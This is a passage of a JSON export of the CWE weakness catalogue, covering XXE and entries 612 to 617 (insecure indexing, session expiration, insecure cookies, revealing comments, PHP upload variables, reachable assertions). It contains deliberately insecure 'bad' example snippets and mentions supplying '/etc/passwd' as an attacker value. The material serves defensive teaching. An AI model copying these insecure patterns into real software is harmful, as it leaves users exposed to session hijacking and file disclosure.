script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1306"},{"Reference":"CVE-2012-5656","Description":"XXE during SVG image conversion","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5656"},{"Reference":"CVE-2012-2239","Description":"XXE in PHP application allows reading the application\'s configuration file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2239"},{"Reference":"CVE-2012-3489","Description":"XXE in database server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3489"},{"Reference":"CVE-2012-4399","Description":"XXE in rapid web application development framework allows reading arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4399"},{"Reference":"CVE-2012-3363","Description":"XXE via XML-RPC request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3363"},{"Reference":"CVE-2012-0037","Description":"XXE in office document product using RDF.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0037"},{"Reference":"CVE-2011-4107","Description":"XXE in web-based administration tool for database.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4107"},{"Reference":"CVE-2010-3322","Description":"XXE in product that performs large-scale data analysis.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3322"},{"Reference":"CVE-2009-1699","Description":"XXE in XSL stylesheet functionality in a common library used by some web browsers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1699"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":43,"Entry_Name":"XML External Entities"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"221"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-496"}},{"attr":{"@_External_Reference_ID":"REF-497"}},{"attr":{"@_External_Reference_ID":"REF-498"}},{"attr":{"@_External_Reference_ID":"REF-499"}},{"attr":{"@_External_Reference_ID":"REF-500"}},{"attr":{"@_External_Reference_ID":"REF-501"}}]},"Notes":{"Note":{"#text":"CWE-918 (SSRF) and CWE-611 (XXE) are closely related, because they both involve web-related technologies and can launch outbound requests to unexpected destinations. However, XXE can be performed client-side, or in other contexts in which the software is not acting directly as a server, so the \\"Server\\" portion of the SSRF acronym does not necessarily apply.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Background_Details, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Name, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through XML External Entity File Disclosure","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through XML External Entity Reference","attr":{"@_Date":"2013-02-21"}},{"#text":"Improper Restriction of XML External Entity Reference (\'XXE\')","attr":{"@_Date":"2019-06-20"}}]}},"612":{"attr":{"@_ID":"612","@_Name":"Improper Authorization of Index Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product creates a search index of private or sensitive documents, but it does not properly limit index access to actors who are authorized to see the original information.","Extended_Description":"Web sites and other document repositories may apply an indexing routine against a group of private documents to facilitate search.  If the index\'s results are available to parties who do not have access to the documents being indexed, then attackers could obtain portions of the documents by conducting targeted searches and reading the results.  The risk is especially dangerous if search results include surrounding text that was not part of the search query. This issue can appear in search engines that are not configured (or implemented) to ignore critical files that should remain hidden; even without permissions to download these files directly, the remote user could read them.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1230","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":48,"Entry_Name":"Insecure Indexing"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1050"}}},"Notes":{"Note":{"#text":"This weakness is probably under-studied and under-reported","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, References, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Insecure Indexing","attr":{"@_Date":"2008-04-11"}},{"#text":"Information Leak Through Indexing of Private Data","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Indexing of Private Data","attr":{"@_Date":"2020-02-24"}}]}},"613":{"attr":{"@_ID":"613","@_Name":"Insufficient Session Expiration","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"According to WASC, \\"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\\"","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"287","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Set sessions/credentials expiration date."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following snippet was taken from a J2EE web.xml deployment descriptor in which the session-timeout parameter is explicitly defined (the default value depends on the container). In this case the value is set to -1, which means that a session will never expire.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"&lt;web-app&gt;&lt;/web-app&gt;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"[...snipped...]&lt;session-config&gt;&lt;/session-config&gt;","xhtml:br":["",""],"xhtml:div":{"#text":"&lt;session-timeout&gt;-1&lt;/session-timeout&gt;","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":47,"Entry_Name":"Insufficient Session Expiration"}},"Notes":{"Note":{"#text":"The lack of proper session expiration may improve the likely success of certain attacks. For example, an attacker may intercept a session ID, possibly via a network sniffer or Cross-site Scripting attack. Although short session expiration times do not help if a stolen token is immediately used, they will protect against ongoing replaying of the session ID. In another scenario, a user might access a web site from a shared computer (such as at a library, Internet cafe, or open work environment). Insufficient Session Expiration could allow an attacker to use the browser\'s back button to access web pages previously accessed by the victim.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"WASC","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"614":{"attr":{"@_ID":"614","@_Name":"Sensitive Cookie in HTTPS Session Without \'Secure\' Attribute","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The Secure attribute for sensitive cookies in HTTPS sessions is not set, which could cause the user agent to send those cookies in plaintext over an HTTP session.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"311","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Always set the secure attribute when the cookie should sent via HTTPS only."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The snippet of code below, taken from a servlet doPost() method, sets an accountID cookie (sensitive) without calling setSecure(true).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Cookie c = new Cookie(ACCOUNT_ID, acctID);response.addCookie(c);","xhtml:br":""}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0462","Description":"A product does not set the Secure attribute for sensitive cookies in HTTPS sessions, which could cause the user agent to send those cookies in plaintext over an HTTP session with the product.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0462"},{"Reference":"CVE-2008-3663","Description":"A product does not set the secure flag for the session cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3663"},{"Reference":"CVE-2008-3662","Description":"A product does not set the secure flag for the session cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3662"},{"Reference":"CVE-2008-0128","Description":"A product does not set the secure flag for a cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0128"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"102"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":{"#text":"Unset Secure Attribute for Sensitive Cookies in HTTPS Session","attr":{"@_Date":"2008-04-11"}}}},"615":{"attr":{"@_ID":"615","@_Name":"Inclusion of Sensitive Information in Source Code Comments","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"While adding general comments is very useful, some programmers tend to leave important data, such as: filenames related to the web application, old links or links which were not meant to be browsed by users, old code fragments, etc.","Extended_Description":"An attacker who finds these comments can map the application\'s structure and files, expose hidden parts of the site, and study the fragments of code to reverse engineer the application, which may help develop further attacks against the site.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"540","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"546","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Distribution","Description":"Remove comments which have sensitive information about the design/implementation of the application. Some of the comments may be exposed to the user and affect the security posture of the application."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following comment, embedded in a JSP, will be displayed in the resulting HTML output.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":"&lt;!-- FIXME: calling this with more than 30 args kills the JDBC server --&gt;"}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-6197","Description":"Version numbers and internal hostnames leaked in HTML comments.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6197"},{"Reference":"CVE-2007-4072","Description":"CMS places full pathname of server in HTML comment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4072"},{"Reference":"CVE-2009-2431","Description":"blog software leaks real username in HTML comment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2431"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Observed_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Comments","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Comments","attr":{"@_Date":"2020-02-24"}}]}},"616":{"attr":{"@_ID":"616","@_Name":"Incomplete Identification of Uploaded File Variables (PHP)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The PHP application uses an old method for processing uploaded files by referencing the four global variables that are set for each file (e.g. $varname, $varname_size, $varname_name, $varname_type). These variables could be overwritten by attackers, causing the application to process unauthorized files.","Extended_Description":"These global variables could be overwritten by POST requests, cookies, or other methods of populating or overwriting these variables. This could be used to read or process arbitrary files by providing values such as \\"/etc/passwd\\".","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"345","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"473","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use PHP 4 or later."},{"Phase":"Architecture and Design","Description":"If you must support older PHP versions, write your own version of is_uploaded_file() and run it against $HTTP_POST_FILES[\'userfile\']))"},{"Phase":"Implementation","Description":"For later PHP versions, reference uploaded files using the $HTTP_POST_FILES or $_FILES variables, and use is_uploaded_file() or move_uploaded_file() to ensure that you are dealing with an uploaded file."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"As of 2006, the \\"four globals\\" method is probably in sharp decline, but older PHP applications could have this issue.","Body_Text":"In the \\"four globals\\" method, PHP sets the following 4 global variables (where \\"varname\\" is application-dependent):","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$varname = name of the temporary file on local machine$varname_size = size of file$varname_name = original name of file provided by client$varname_type = MIME type of the file","xhtml:br":["","",""]}}},{"Intro_Text":"\\"The global $_FILES exists as of PHP 4.1.0 (Use $HTTP_POST_FILES instead if using an earlier version). These arrays will contain all the uploaded file information.\\"","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$_FILES[\'userfile\'][\'name\'] - original filename from client$_FILES[\'userfile\'][\'tmp_name\'] - the temp filename of the file on the server","xhtml:br":""}},"Body_Text":"** note: \'userfile\' is the field name from the web form; this can vary."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1460","Description":"Forum does not properly verify whether a file was uploaded or if the associated variables were set by POST, allowing remote attackers to read arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1460"},{"Reference":"CVE-2002-1759","Description":"Product doesn\'t check if the variables for an upload were set by uploading the file, or other methods such as $_POST.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1759"},{"Reference":"CVE-2002-1710","Description":"Product does not distinguish uploaded file from other files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1710"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Identification of Uploaded File Variables (PHP)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP25","Entry_Name":"Tainted input to variable"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-502"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"617":{"attr":{"@_ID":"617","@_Name":"Reachable Assertion","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary.","Extended_Description":{"xhtml:p":["While assertion is good for catching logic errors and reducing the chances of reaching more serious vulnerability conditions, it can still lead to a denial of service.","For example, if a server handles multiple simultaneous connections, and an assert() occurs in one single connection that causes all other connections to be dropped, this is a reachable assertion that leads to a denial of service."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant"}},"Alternate_Terms":{"Alternate_Term":{"Term":"assertion failure"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"An attacker that can trigger an assert statement can still lead to a denial of service if the relevant code can be triggered by an attacker, and if the scope of the assert() extends beyond the attacker\'s own session."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Make sensitive open/close operation non reachable by directly user-controlled data (e.g. open/close resources)"},{"Phase":"Implementation","Strategy":"Input Validation","Description":"Perform input validation on user data."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the excerpt below, an AssertionError (an unchecked exception) is thrown if the user hasn\'t entered an email address in an HTML form.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String email = request.getParameter(\\"email_address\\");assert email != null;","xhtml:br":""}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-6767","Description":"FTP server allows remote attackers to cause a denial of service (daemon abort) via crafted commands which trigger an assertion failure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6767"},{"Reference":"CVE-2006-6811","Description":"Chat client allows remote attackers to cause a denial of service (crash) via a long message string when connecting to a server, which causes an assertion failure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6811"},{"Reference":"CVE-2006-5779","Description":"Product allows remote attackers to cause a denial of service (daemon crash) via LDAP BIND requests with long authcid names, which triggers an assertion failure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5779"},{"Reference":"CVE-2006-4095","Description":"Product allows remote attackers to cause a denial of service (crash) via certain queries, which cause an assertion failure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4095"},{"Reference":"CVE-2006-4574","Description":"Chain: security monitoring product has an off-by-one error that leads to unexpected length values, triggering an assertion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4574"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java 